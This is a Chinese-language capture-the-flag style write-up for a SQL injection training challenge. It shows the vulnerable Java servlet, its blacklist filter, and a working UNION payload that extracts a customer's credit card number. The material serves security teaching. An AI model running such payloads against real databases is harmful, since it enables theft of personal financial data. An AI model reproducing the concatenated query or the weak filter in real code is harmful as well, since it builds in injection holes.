SQL Injection Challenge Three(SQL 注入 3 )

题介绍

需要利用SQL注入点获得用户Mary Martin的信用卡号字段的值

功能实现

请求的数据包

POST /challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6 HTTP/1.1


theUserName=%22+or+%221%22%3D%221

对应的解析文件 src/main/java/servlets/module/challenge/SqlInjection3.java

log.debug("User Submitted - " + theUserName);
theUserName = SqlFilter.levelThree(theUserName);  //进行了过滤 
log.debug("Filtered to " + theUserName);
String ApplicationRoot = getServletContext().getRealPath("");
log.debug("Servlet root = " + ApplicationRoot );

log.debug("Getting Connection to Database");
Connection conn = Database.getChallengeConnection(ApplicationRoot, "SqlChallengeThree");
Statement stmt = conn.createStatement();
log.debug("Gathering result set");
ResultSet resultSet = stmt.executeQuery("SELECT customerName FROM customers WHERE customerName = '" + theUserName + "'");

// 具体过滤代码 
public static String SqlFilter.levelThree (String input)
{
    log.debug("Filtering input at SQL levelThree");
    input = input.toLowerCase();
    input = input.replaceAll("|", "").replaceAll("&", "").replaceAll("!", "").replaceAll("-", "").replaceAll(";", "");
    while(input.contains("or") || input.contains("true") || input.contains("false") || input.contains("and") || input.contains("is"))  //不允许出现这些字符 
        input = input.replaceAll("or", "").replaceAll("true", "").replaceAll("and", "").replaceAll("false", "").replaceAll("is", "");
    return input;
}

解题步骤

当前SQL是查询用户名，要想获得另一个信用卡字段，必须使用联合查询，因此构造联合查询即可

Mary Martin' union select creditcardnumber from customers where customername='Mary Martin'#

怎样猜到信用卡字段?
根据题的说明即可，拼接出来

总结

由于输入验证不当导致的问题，增加一些校验，就会提高一些攻击门槛